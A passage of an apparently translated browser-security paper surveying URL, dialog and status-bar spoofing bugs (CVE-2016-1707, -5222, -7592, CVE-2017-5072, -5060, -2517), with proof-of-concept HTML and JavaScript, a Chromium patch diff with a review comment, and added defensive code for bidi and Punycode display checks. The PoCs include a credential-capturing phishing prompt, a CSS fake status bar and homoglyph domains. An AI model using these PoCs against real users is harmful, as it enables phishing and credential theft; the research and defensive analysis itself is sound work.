  t.document.write("<h1>Address bar says https://www.gmail.com/ - this is NOT https://www.gmail.com/</h1>");
}
</script>
<a href="https://hack.com::/" target="aaaa"
   onclick="setTimeout('pwned()', '500')">click me</a><br>

Now let's walk through the whole loading process of the code. First, clicking the "click me" link opens a new browser window named aaaa that loads the page https://hack.com:: (this address can be anything). After 500 microseconds, pwned() runs and opens https://www.gmail.com in the aaaa window; this URL can of course be empty. Up to this point the code has run normally; the code that follows is the core code that triggers the vulnerability.

Decoded base64 payload code:

<body></body>
<script>
var link = document.createElement('a');
link.href = 'https://gmail.com::';
document.body.appendChild(link);
link.click();
</script>

Committing https://gmail.com:: in the aaaa window's page is a very peculiar thing: https://gmail.com:: is an invalid address, so how can it be committed? After trying a variety of methods, I found that it can be done by clicking an a tag (window.open/location cannot), and the invalid address is then in a pending state. At this point, what Chrome has actually loaded is about:blank (we are now in the about:blank domain), but when finally processing the URL to display in the address bar, Chrome chose the pending https://gmail.com:: as the final committed address. Once https://gmail.com:: is loaded, the URL address bar presents it as https://gmail.com, with the two colons (::) hidden. At this point the whole loading process is complete, and a perfect URL spoofing vulnerability has been produced.

How to fix

The crux of this vulnerability is that Chrome allowed an invalid address to be committed while a web page was loading. Google's patch is based on exactly this: an invalid address may not be committed when a web page loads, and if an invalid address is detected, the current URL is set directly to about:blank.

// Ensure the URL is as expected (and already reported to the delegate).

- DCHECK (currentURL == _lastRegisteredRequestURL) // Just before the current judgment URL

And finally requested URL Are the same

+ // If | _lastRegisteredRequestURL | is invalid then | currentURL | will be

+ // "about: blank".

+ DCHECK ((currentURL == _lastRegisteredRequestURL) ||

+ (! _lastRegisteredRequestURL.is_valid () && // To determine whether the increase is an invalid

URL

+ _documentURL.spec () == [url :: kAboutBlankURL)] (url :: kAboutBlankURL)))

<< std :: endl

<< "currentURL = [" << currentURL << "]" << std :: endl

<< "_lastRegisteredRequestURL = [" << _lastRegisteredRequestURL <<

"]";

// This is the point where the document's URL has actually changed, and

// pending navigation information should be applied to state information.

[Self setDocumentURL: net :: GURLWithNSURL ([_ webView URL])];

- DCHECK (_documentURL == _lastRegisteredRequestURL);

+ if (! _lastRegisteredRequestURL.is_valid () &&

+ _documentURL! = _lastRegisteredRequestURL) {

+ // if | _lastRegisteredRequestURL | is an invalid URL, then

| _documentURL |

+ // will be "about: blank".

+ [[Self sessionController] updatePendingEntry: _documentURL];

+}

+ DCHECK (_documentURL == _lastRegisteredRequestURL ||

+ (! _lastRegisteredRequestURL.is_valid () &&

+ _documentURL.spec () == url :: kAboutBlankURL));

self.webStateImpl-> OnNavigationCommitted (_documentURL);

[Self commitPendingNavigationInfo];

if ([self currentBackForwardListItemHolder] -> navigation_type () ==
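Review bot: In the first added DCHECK, the new comment says |currentURL| will be "about:blank" when |_lastRegisteredRequestURL| is invalid, but the condition tests _documentURL.spec(), and _documentURL is only refreshed further down by setDocumentURL. Either compare currentURL in that assertion or reword the comment so both describe the same variable. Also note that DCHECK is a debug-build assertion, so the only part of this change that alters shipped behaviour is the new if block that calls updatePendingEntry: _documentURL. That block fires for any mismatch when _lastRegisteredRequestURL is invalid and relies on the following DCHECK to confirm that _documentURL is about:blank; a comment stating that any committed document URL is acceptable there, or an explicit check, would make the intent clear.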

2.6 Address Bar Spoofing Triggered by Right-Click (CVE-2016-5222)

In CVE-2016-1707 above, we used two consecutive colons (:) to construct a malformed URL, which caused the vulnerability. CVE-2016-5222 uses the same technique.

A link on a web page can be opened in several ways: left-click, right-click and open in a new window, or drag and drop the link into the address bar. Left-clicking is the way links are opened most often. Right-click-open-in-new-window and drag-and-drop are used less, so browser designers may overlook their security. CVE-2016-5222 takes this other route: the vulnerability occurs when a link is opened in a new window via right-click.

Affected Products: Chrome < v55.0.2883.75 for Windows / Mac / Linux

Vulnerability Announcement: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5222

We run the following very simple code in the Chrome browser and open the link by right-clicking it and choosing to open it in a new window.

<a href="google.com::"> Click me </a>

Figure 14

Figure 14 shows that although the browser navigates to the google.com page, the URL in the address bar is not the usual one: google.com: . At that time I felt that there might be some error in how this URL was processed.

Next, I tried different ways of submitting URLs and finally found one that allows URL spoofing: when the page redirects automatically and the redirect succeeds, the browser navigates to the target page, but the URL in the address bar is not updated and does not change. In other words, to spoof the URL of Google.com, it is enough to find a redirect on Google. Run the following code:

<a href="www.google.com::/url?q=http%3A%2F%2Fxisigr.com%2Ftest%2Fspoof%2Fchrome%2F3.html&sa=D&sntz=1&usg=AFQjCNG-QnLGG1ixIlOzlpZQn5cweSU3Cw">22222</a>

Right-click the link and open it in a new window; google.com redirects to http://xisigr.com/test/spoof/chrome/3.html. As Figure 15 shows, after the redirect has taken place the URL in the address bar is still stuck on google.com, and the spoofing attack is complete.

Figure 15

2.8 Dialog Spoofing Caused by Window Size (CVE-2016-7592)

CVE-2016-5222 above, where we discussed the different ways of opening a web page (left-click, right-click and open in a new window, drag and drop a link), suggests an approach: break the browser's functions down into finer pieces to enlarge the attack surface, because rarely used functions tend to have the weakest security defenses. CVE-2016-7592 follows the same line of thought: the vulnerability is caused by using a custom window size.
Affected Products: Apple Safari <10.0.2

Vulnerability Announcement: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7592

When hunting for URL spoofing vulnerabilities, the payloads we construct often use window.open(). But do not overlook the different parameters of window.open(); they also add attack paths. Consider the following PoC:

<script>
function phishing() {
    aa = window.open('http://www.google.com');
    name = aa.prompt("Enter the name for google");
    passwd = aa.prompt("Enter the password");
    aa.alert("Your name is:" + name + "||" + "Your Password is:" + passwd);
    aa.document.write("<h1>phishing</h1>");
}
</script>

<button onclick="phishing()">Click me</button>

For URL spoofing vulnerabilities, this PoC framework is both classic and common. It is classic because, in the early days of URL spoofing vulnerabilities, this PoC defeated a lot of browsers; it is common because, after some time, browsers blocked this kind of PoC long ago.

Now we add parameters to window.open() so that it opens a pop-up window and changes the window size. See the PoC below:

===== CVE-2016-7592 =====

<script>
function phishing() {
    // Same PoC as above; only the window name and size parameters are new.
    aa = window.open('http://www.google.com', 'new', 'width=800,height=600');
    name = aa.prompt("Enter the name for google");
    passwd = aa.prompt("Enter the password");
    aa.alert("Your name is:" + name + "||" + "Your Password is:" + passwd);
    aa.document.write("<h1>phishing</h1>");
}
</script>

<button onclick="phishing()">Click me</button>

Changing the size of the window is what makes the JavaScript dialog's blocking of URL navigation take effect. A pop-up, non-full-screen window is a necessary condition; only under these conditions can the JavaScript dialog block the URL navigation. Figure 16 shows the whole spoofing process after the PoC is run.

Figure 16
2.9 Right-to-Left (RTL) URL Spoofing (CVE-2017-5072)

We have already mentioned that some languages are displayed from right to left, such as Arabic and Hebrew. Text containing these characters can run in both directions, from left to right (LTR) or from right to left (RTL). When a URL contains bidirectional text, both its logical order and its visual rendering in the address bar must be handled properly. CVE-2017-5072, discussed next, is an RTL URL spoofing vulnerability in Chrome.

Affected Products: Chrome M59, Android <4.2

Vulnerability Announcement: https://bugs.chromium.org/p/chromium/issues/detail?id=709417

Unicode Bidirectional Algorithm

The Unicode Bidirectional Algorithm [5] (BIDI for short) is used to process bidirectional text in URLs. Bidirectional text is a single string that contains both characters displayed from left to right and characters displayed from right to left. For example, the most widely used Latin script is displayed from left to right (LTR), while Arabic and Hebrew text is displayed from right to left (RTL). When bidirectional text is present, the characters are still interpreted in logical order; only the display order is affected. The display order of bidirectional text depends on the directional properties of the characters in the text. When a browser handles a URL that contains bidirectional text, a serious security problem can arise: the URL is displayed in the wrong order, which leads to URL spoofing attacks.

CVE-2017-5072

POC: http://127.0.0.1/%D8%A7/example.org

"http://127.0.0.1/%D8%A7/example.org" is a URL with bidirectional text. %D8%A7 is the Unicode character U+0627, an Arabic character whose display direction is RTL. If the browser has no sound policy for URLs with bidirectional text, the %D8%A7 may force the URL to be displayed RTL, so that the address bar finally presents example.org/ / 127.0.0.1 to the user. The user will think the site currently being visited is example.org, while the site actually visited is 127.0.0.1. See Figure 17.

5 http://unicode.org/reports/tr9/

Figure 17
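A display-side check for the case described above, as an added example (not Chrome's fix and not code from the original paper): path segments whose decoded text contains right-to-left script or bidi control characters are kept percent-encoded, so the host always stays leftmost and in logical order. The function names and the second sample URL are assumptions made for this example.

```javascript
// Added example, not Chrome's fix. Characters that can reorder a displayed URL:
// Arabic and Hebrew script (strong RTL) plus the explicit bidi control characters.
const RTL_OR_BIDI = /[\p{Script=Arabic}\p{Script=Hebrew}\u200e\u200f\u202a-\u202e\u2066-\u2069]/u;

// Decode one path segment for display, unless decoding would change how the
// URL is read (RTL text, a bidi control, whitespace, or a delimiter such as "/").
function displaySegment(segment) {
  let decoded;
  try {
    decoded = decodeURIComponent(segment);
  } catch (e) {
    return { text: segment, rtl: false };    // malformed escape: show as-is
  }
  if (RTL_OR_BIDI.test(decoded)) return { text: segment, rtl: true };
  if (/[\/?#%\s]/.test(decoded)) return { text: segment, rtl: false };
  return { text: decoded, rtl: false };
}

// Build the text for the address bar: origin first, then the path.
// Query and fragment are left out of the displayed form in this example.
function displayUrl(raw) {
  const url = new URL(raw);                   // throws on an invalid URL
  const segments = url.pathname.split('/').map(displaySegment);
  return {
    host: url.host,
    display: url.origin + segments.map((s) => s.text).join('/'),
    hasRtl: segments.some((s) => s.rtl),
  };
}

const POC = 'http://127.0.0.1/%D8%A7/example.org';      // URL from the paper
const BENIGN = 'http://example.org/caf%C3%A9/menu';      // constructed sample
console.log(displayUrl(POC), displayUrl(BENIGN));
```

The hasRtl flag lets the caller go further, for example by showing only the origin when a segment was held back.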

2.10 Internationalized Domain Name Spoofing (CVE-2017-5060)

The internationalized domain name specification [rfc3490] [6], released in 2003, allows most Unicode characters to be used in domain names; this specification is generally called IDNA2003. In 2010 a revision of IDNA2003, [rfc5895] [7], was approved and released; the revision is called IDNA2008. But IDNA2003 and IDNA2008 did not effectively solve some of the problems with internationalized domain names, so the Unicode Consortium then released [UTS-46] [8], which addresses some compatibility issues.

IDNA uses the Punycode algorithm to convert non-ASCII domain names into ASCII domain names. Punycode maps any non-ASCII Unicode string uniquely to a string that uses only letters, digits and hyphens, and every encoded domain name is prefixed with xn-- to indicate that it is Punycode. This means that we can put arbitrary characters after xn--, which is likely to deceive users. For the URL http:// . com, the corresponding Punycode URL is http://xn--google.com .

6 https://tools.ietf.org/html/rfc3490

7 https://tools.ietf.org/html/rfc5895

8 http://unicode.org/reports/tr46/

CVE-2017-5060 is a typical URL spoofing vulnerability caused by Cyrillic characters, found by Xudong Zheng [9]. The cause is that when all characters of a domain name are Cyrillic, Chrome's address bar rendered the Cyrillic glyphs directly and did not convert the name to Punycode. Some Latin and Cyrillic characters look very similar, so from the user's visual point of view the address bar shows www.apple.com. Visiting https://www.xn--80ak6aa92e.com/ in Chrome produces the effect shown in Figure 18. However, when the user clicks the small green lock to view the origin information (Origin Info Bubble, OIB), the real, logical-order form is visible: https://www.xn--80ak6aa92e.com/, the Punycode conversion of the Cyrillic characters.

Figure 18

Chrome fixed this vulnerability 2 months after receiving the report and gave the discoverer a reward of 2000 US dollars [10].

In a dramatic twist, the discoverer reported the same issue to Firefox, but Firefox explicitly replied that it would not fix it [11]. As Figure 19 shows, when https://www.xn--80ak6aa92e.com is visited, the address bar shows www.apple.com, and the certificate also shows www.apple.com.

9 https://www.xudongz.com/blog/2017/idn-phishing/

10 https://bugs.chromium.org/p/chromium/issues/detail?id=683314

11 https://bugzilla.mozilla.org/show_bug.cgi?id=1332714

Figure 19

The reason given by the Firefox security team is that Cyrillic characters should not be treated as second-class citizens, and that scripts other than Latin should be given an equal opportunity to develop on the web. They also think that domain registrars should bear part of the responsibility: such spoofing domain names should not be registered to users. They encourage users to complain to the domain registrar.

Many people objected to Firefox "turning a blind eye" to this security risk. Faced with URL spoofing in which both the domain name and the certificate look identical, Firefox does nothing. Frankly, this choice of business first and security second leaves users very disappointed.
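One way a client could decide when to keep a hostname in its Punycode form, as an added example that is neither Chrome's code nor the author's: a Punycode decoder following RFC 3492, plus a check for labels made up entirely of Cyrillic letters that resemble Latin ones. The lookalike table and the function names are constructed for illustration, the table is not exhaustive, and the host is assumed to arrive in its ASCII form.

```javascript
// Added example, not Chrome's implementation. Punycode parameters from RFC 3492.
const BASE = 36, TMIN = 1, TMAX = 26, SKEW = 38, DAMP = 700;

// Bias adaptation (RFC 3492, section 6.1).
function adapt(delta, numPoints, first) {
  delta = first ? Math.floor(delta / DAMP) : Math.floor(delta / 2);
  delta += Math.floor(delta / numPoints);
  let k = 0;
  while (delta > Math.floor(((BASE - TMIN) * TMAX) / 2)) {
    delta = Math.floor(delta / (BASE - TMIN));
    k += BASE;
  }
  return k + Math.floor(((BASE - TMIN + 1) * delta) / (delta + SKEW));
}
function digitValue(ch) {
  const c = ch.toLowerCase().charCodeAt(0);
  if (c >= 0x61 && c <= 0x7a) return c - 0x61;      // a-z -> 0..25
  if (c >= 0x30 && c <= 0x39) return c - 0x30 + 26; // 0-9 -> 26..35
  throw new RangeError('invalid Punycode digit: ' + ch);
}

// Decode one label body (the part after "xn--") to a Unicode string.
function punycodeDecode(input) {
  const cut = input.lastIndexOf('-');
  const out = cut > 0 ? Array.from(input.slice(0, cut), (ch) => ch.codePointAt(0)) : [];
  let n = 128, i = 0, bias = 72, pos = cut > 0 ? cut + 1 : 0;
  while (pos < input.length) {
    const oldi = i;
    for (let w = 1, k = BASE; ; k += BASE) {
      if (pos >= input.length) throw new RangeError('truncated Punycode input');
      const d = digitValue(input[pos++]);
      i += d * w;
      const t = k <= bias ? TMIN : k >= bias + TMAX ? TMAX : k - bias;
      if (d < t) break;
      w *= BASE - t;
    }
    bias = adapt(i - oldi, out.length + 1, oldi === 0);
    n += Math.floor(i / (out.length + 1));
    i %= out.length + 1;
    out.splice(i++, 0, n);                  // insert code point n at position i
  }
  return String.fromCodePoint(...out);
}

// Constructed, non-exhaustive table: Cyrillic letters that render like Latin ones.
const CYRILLIC_TO_LATIN = new Map(Object.entries({
  '\u0430': 'a', '\u0441': 'c', '\u0501': 'd', '\u0435': 'e', '\u04bb': 'h',
  '\u0456': 'i', '\u0458': 'j', '\u04cf': 'l', '\u043e': 'o', '\u0440': 'p',
  '\u051b': 'q', '\u0455': 's', '\u051d': 'w', '\u0445': 'x', '\u0443': 'y',
}));

// Latin string the label imitates, or null when some character has no lookalike.
function latinSkeleton(label) {
  let out = '';
  for (const ch of label) {
    const latin = CYRILLIC_TO_LATIN.get(ch);
    if (latin === undefined) return null;
    out += latin;
  }
  return out || null;
}

// Display form of an ASCII hostname: lookalike-only labels stay as "xn--...".
function displayHost(host) {
  const shown = [], warnings = [];
  for (const label of host.toLowerCase().split('.')) {
    const unicode = label.startsWith('xn--') ? punycodeDecode(label.slice(4)) : label;
    const skeleton = latinSkeleton(unicode);
    if (skeleton === null) { shown.push(unicode); continue; }
    shown.push(label);
    warnings.push(label + ' imitates "' + skeleton + '"');
  }
  return { shown: shown.join('.'), warnings };
}
console.log(displayHost('www.xn--80ak6aa92e.com')); // hostname from the paper
```

A label that mixes lookalike and non-lookalike Cyrillic letters is displayed in Unicode by this check; handling mixed-script labels is a separate policy decision.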

2.11 Address Bar Spoofing Triggered by the Search Engine (CVE-2017-2517)

In modern browsers, the address bar has taken on many new functions and responsibilities beyond its most basic ones of showing the current page's URL and accepting URLs typed by the user for navigation. For example, most browsers have merged the address bar and the search bar into one, commonly called a smart address bar. With this design, the logic that separates URLs from searches may go wrong, resulting in address bar spoofing. CVE-2017-2517 is a Safari address bar spoofing vulnerability caused by the search engine.

Affected Products: iOS <10.3.3, Safari

Vulnerability Announcement: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2517

Safari's URL address bar and search bar are merged, and Safari's settings offer a choice of default search engine, such as Google, Yahoo, Bing, Baidu and DuckDuckGo. Safari has a logic error here: when the content searched for in the default search engine is a URL, the address bar displays that URL.

For example, with Baidu as the default search engine, search Baidu for google.com. The address bar clearly shows google.com, because the browser considers its context to be a search, and the status bar presents the search content. This can deceive the user into believing that the URL in the address bar is google.com at this moment. See Figure 20.

Figure 20

Going one step further, if the default search engine has an XSS vulnerability, an attacker who has faked the address bar can also control the page content at the same time and carry out a perfect phishing attack.

2.12 Browser status bar spoofing

The role of the browser status bar is to tell the user where a link will take them. The status bar is usually displayed in the lower left corner of the browser. Historically, the status bar was a fixed browser UI module anchored at the very bottom. Later, as browser front ends became more concise, the status bar was shown as a bubble instead (Status Bubble) [12], displayed only when the mouse moves over a link.

12 https://www.chromium.org/user-experience/status-bubble

Figure 21 shows Chrome, Firefox and IE: when the mouse moves over the google link, the status bar emerges like a bubble in the lower left corner of the browser area and shows the URL that the link navigates to. When the mouse moves off the link, the bar disappears instantly.

Figure 21

It is easy to see that this status bar design makes the UI more concise and improves the user's experience of clicking links. But from another point of view, the status bar UI is displayed inside the page area of the browser, and this area can be controlled with script. Does this bring a security risk?

CSS3 added support for rounded corners (border-radius), shadows (box-shadow) and gradients (Gradients), which makes it possible to fake a status bar with CSS.

POC:

<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type">
<title>Status Bar Spoofing Vulnerability</title>
<style>
/* Fake status bubble, hidden until the mouse is over the spoofed link. */
.chrome {
    background: #DFDFDF;
    width: 230px;
    height: 23px;
    -webkit-border-top-right-radius: 4px;
    font-size: 12px;
    font-family: "Microsoft YaHei";
    color: #666666;
    line-height: 23px;
    padding: 0px 0px 0px 3px;
    position: absolute;
    bottom: 0px;
    left: 0px;
    display: none;
}
.link {
    color: blue;
    text-decoration: underline;
    cursor: pointer;
}
</style>
<script>
function show(status) {
    document.getElementById("statusbar").style.display = status;
}
function goto(url) {
    location = url;
}
</script>
</head>
<body>
<br><br><br>
<center>
<h1>CSS Handling Status Bar Spoofing Vulnerability</h1><br><br><br><br>
<b>The True Status Bar:</b> <a href="http://www.google.com">Google</a>
<br><br>
<b>The Spoof Status Bar:
<span class="link" onMouseover="show('block');" onMouseout="show('none')"
      onClick="goto('http://www.xisigr.com/')">Google</span></b>
<br><br></center>
<div id="statusbar" class="chrome">www.google.com</div>
</body>
</html>

Taking Chrome as an example, visit the online demo: http://xisigr.com/html5/css/spoofurl.html . Move the mouse over "The True Status Bar: Google" to show the real address bar, as in Figure 22:

Figure 22

Move the mouse over "The Spoof Status Bar: Google" to show the fake address bar, as in Figure 23:

Figure 23

The two status bubbles are essentially identical. The author discovered this problem in 2011 and reported it to several browser vendors at the time. Their feedback was that this is an interesting issue, but that they do not intend to fix it. To this day, CSS can still be used to forge a realistic address bar. Securityfocus.com recorded these issues:

Microsoft Internet Explorer CSS Handling Status Bar Spoofing Vulnerability [13]

Google Chrome CSS Handling Status Bar Spoofing Vulnerability [14]

Mozilla Firefox CSS Handling Status Bar Spoofing Vulnerability [15]

Nevertheless, we still want to raise the CSS fake address bar issue here for open discussion. When a user can use script to forge key browser UI, deception is likely to happen. We can then look back at the browser's "Dead Man Walking" boundary that we mentioned earlier, beyond which trust no longer holds.

3 Future

For a long time to come, browser UI will remain in a chaotic state, and browser vendors differ considerably in how they understand and present the same UI. For example, the security indicator in a modern browser's address bar is the most common browser security UI; it identifies the current security status of a site. For the insecure network protocol (http), a warning symbol such as 'X' or '!' is used; for the secure and reliable network protocol (https), a lock or shield symbol is used, colored red or green. As Figure 24 shows, browser vendors display different status indicators for the same site or the same technical term.

13 http://www.securityfocus.com/bid/47547

14 http://www.securityfocus.com/bid/47548

15 http://www.securityfocus.com/bid/47549

Figure 24

In "Rethinking Connection Security Indicators" [16], Google surveyed two questions about the security indicator. For https: what does the green symbol to the left of the URL mean to you? For http: what does the white symbol to the left of the URL mean to you? Google surveyed 1329 people on whether they understood the security indicators that the Chrome browser displays during normal web browsing, and then divided the survey results into 7 categories: "connection, identity, protocol, security, icon appearance, I don't know, and incorrect theory." While most respondents (though non-experts) have at least a basic understanding of the https indicator, many people are not familiar with the http indicator.

Our discussion of browser UI security coincides with the migration and transition from the desktop browser experience to mobile browsers. Compared with the earlier desktop era, people are gradually shifting to using mobile devices such as the iPad, iPhone and Apple Watch in daily life. See Figure 25.

16 https://www.usenix.org/system/files/conference/soups2016/soups2016-paper-porter-felt.pdf

Figure 25

We have imagined using a browser on a watch. After hackers cracked the Apple Watch and ran a browser on it, the results were predictable [17]. See Figure 26.

Figure 26

As browser screens get smaller and smaller, every pixel of browser UI has to be fought over. Balancing user experience and security is bound to bring new challenges.

For example, the following four mobile browsers visit Baidu (www.baidu.com) at the same time. The address bar is displayed in four different ways. See Figure 27.

17 http://www.mobypicture.com/user/comex/view/18097875

Figure 27

The first browser shows the https security indicator and the complete domain name.

The second browser shows only the domain name.

The third browser shows only the title.

The fourth browser shows the https security indicator and only the title.

Of these four address bar UIs, which do we think is safer? For the address bar presentation of the last two browsers, an attacker only needs to add <title>Baidu, you know</title> to a malicious page to carry out a URL spoofing attack.

History always moves forward. We enjoy the challenges that new things bring, but we also have to face what old things have left behind. Browsers have been around for decades, and many of the policies and much of the syntax introduced back then are still in use. As time passes and the confrontation between attack and defense grows more intense, some of this old policy and syntax conflicts more and more with "security". For example, the dialogs alert(), prompt() and confirm() entered the browser together with JavaScript in 1995 [18]. These dialog methods are synchronous and still exist in most modern browsers: the JavaScript engine has to pause until the user closes the dialog box before it continues with the code that follows. Many UI spoofing vulnerabilities arise precisely because of this characteristic of dialogs, which blocks certain processes. Chrome has gradually begun to reduce the use of these dialogs in some scenarios and recommends alternatives to dialog boxes, for example the Notifications API and <dialog>.

18 https://developers.google.com/web/updates/2017/03/dialogs-policy
